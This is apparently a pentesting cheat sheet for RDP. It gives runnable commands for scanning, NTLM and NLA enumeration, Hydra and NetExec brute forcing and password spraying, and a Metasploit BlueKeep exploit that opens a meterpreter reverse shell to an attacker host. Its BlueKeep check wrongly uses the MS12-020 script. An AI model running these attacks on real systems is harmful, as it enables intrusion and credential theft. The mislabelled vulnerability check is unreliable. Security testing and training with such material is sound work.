Pentesting RDP

Pentesting 3389 RDP
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft that provides a user with a graphical interface to connect to another computer over a network connection. Often found on port 3389, it is a high-interest target for attackers because a successful compromise typically results in direct, interactive access to the target system. Beyond simple credential harvesting via password spraying or brute force, RDP can be leveraged for lateral movement, session hijacking, or exploiting protocol-level vulnerabilities like ``BlueKeep`` to gain unauthenticated kernel-level access.

Discovery and Enumeration

The first step when encountering an RDP service is confirming the service and gathering useful metadata such as:

• Hostname
• Domain information
• OS version
• Encryption settings
• Whether Network Level Authentication (NLA) is required

Basic port discovery with Nmap. You can find a comprehensive cheat sheet on how to use Nmap here.

nmap -p 3389 --open -T4 -Pn -n 10.1.1.0/24        #Scan a network range for open port 3389 RDP
nmap -sV -p 3389 --open -T4 -Pn -n 10.1.1.0/24    #Scan a network range for open port 3389 RDP with service detection

If you’re scanning large address spaces and need speed, use the masscan tool

sudo masscan -p3389 10.0.0.0/8 --rate 10000 -e tun0     #Scan a large subnet for open port 3389

RDP Nmap Scripts

Nmap includes several NSE scripts specifically for RDP enumeration:

nmap --script rdp-enum-encryption -p3389 10.1.1.1                                                 #Determine supported encryption levels
nmap --script rdp-ntlm-info -p3389 10.1.1.1                                                       #Extract hostname and domain information by extracting NTLM information
nmap --script rdp-vuln-ms12-020 -p3389 10.1.1.1                                                   #Checking for MS12-020 vulnerability
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p3389 -T4 10.1.1.1     #Running multiple RDP scripts

Extracting Domain Information

The rdp-ntlm-info script can reveal valuable Active Directory details. This is extremely valuable if found exposed to the internet. Often, if a risky port such as RDP is exposed, you find other ports or services that can benefit from knowing the domain name, etc., for attacking.

nmap --script rdp-ntlm-info -p3389 10.1.1.1

Example output may reveal:

• NetBIOS computer name
• DNS domain name
• Windows build version

Checking Encryption Configuration

RDP supports different security layers, which may expose weak configurations. You can check encryption levels with the following Nmap command:

nmap --script rdp-enum-encryption -p3389 10.1.1.1

Possible results can include:

• Native RDP Security
• TLS Security
• CredSSP / NLA

Older configurations that support Standard RDP Security may allow downgrade attacks.

Checking if Network Level Authentication (NLA) is Enabled

Network Level Authentication requires authentication before the graphical RDP session begins. If this is not enabled, it allows attackers to connect and view who is logged in to the terminal. This can be leveraged to gather usernames for brute-forcing RDP.

Testing manually with FreeRDP:

xfreerdp /u: /p: /v:10.1.1.1 /dynamic-resolution /sec:tls   #If NLA is enabled, the server will reject unauthenticated connections

To bulk test multiple hosts you can create a file of IPs and use the following command to quickly identify if any hosts have NLA disabled.

while read -r ip; do echo -n "$ip: "; xfreerdp /v:"$ip" /u: /p: /sec:tls /timeout:5000 2>&1 | grep -q 'HYBRID_REQUIRED_BY_SERVER' && echo "NLA Enabled" || echo "NLA Not Enabled"; done < RDP_IPs.txt

Checking for BlueKeep

BlueKeep (CVE-2019-0708) is a critical Remote Code Execution vulnerability affecting older Windows systems running RDP.  The vulnerability exists in the Remote Desktop Services component and allows unauthenticated attackers to execute code remotely.

Affected systems include:

  • Windows 7

  • Windows Server 2008

  • Windows Server 2008 R2

  • Windows XP (legacy patch released)

This vulnerability is considered wormable, meaning it could potentially spread automatically between vulnerable systems. You can check if a host may be vulnerable using an Nmap NSE script:

nmap --script rdp-vuln-ms12-020 -p3389 10.1.1.1      #Check for RDP vulnerabilities

If the target is identified as vulnerable, you can attempt to exploit it with Metasploit. You can find a comprehensive cheat sheet for using Metasploit here.

msfconsole -q
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 10.1.1.1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.2.2.2
run

Screenshot Enumeration

Some RDP login screens can reveal usernames. Some vulnerability scanners, like Nessus, will gather screenshots for you. A good CLI tool is Scrying.

scrying -t rdp://10.1.1.1    #Grab a RDP server screenshot
scrying -f targets.txt       #Grab a RDP server screenshot for a list of targets

Brute Force Attacks

You can brute force RDP with several tools, including THC Hydra. For a comprehensive cheat sheet on using Hydra, click here.

hydra -L users.txt -P passwords.txt rdp://10.1.1.1 -t 4     #Brute force a list of usernames and passwords
hydra -l administrator -P passwords.txt rdp://10.1.1.1      #A single user brute force (If you get a name from screenshot enumeration)

NetExec RDP Attacks

The NetExec tool supports several attacks that you can perform against RDP. You can find my Netexec cheat sheet here with attacks for many other protocols.

nxc rdp 10.1.1.1 -u <user> -p <password>                                       #Testing credentials
nxc rdp 10.1.1.1 -u users.txt -p 'Winter2026!' --continue-on-success           #RDP password spraying
nxc rdp 10.1.1.1 -u users.txt -p passwords.txt                                 #RDP brute forcing
nxc rdp targets.txt -u users.txt -p passwords.txt                              #RDP brute forcing multiple hosts

Connecting to RDP

FreeRDP is an excellent tool for connecting to RDP from Kali or other Linux-based testing systems. If you have successfully compromised credentials using the techniques above, you can attempt to make an RDP connection to the target.

xfreerdp /u:<username> /p:<password> /v:10.1.1.1                                  #Standard connection
xfreerdp /u:<domain>\<username> /p:<password> /v:10.1.1.1                         #Domain authentication
xfreerdp /u:<username> /p:<password> /v:10.1.1.1 /dynamic-resolution              #Dynamic resolution
xfreerdp /u:<username> /p:<password> /v:10.1.1.1 +clipboard                       #Clipboard sharing
xfreerdp /u:<username> /p:<password> /v:10.1.1.1 /drive:share,/home/kali/tools    #Mounting local directory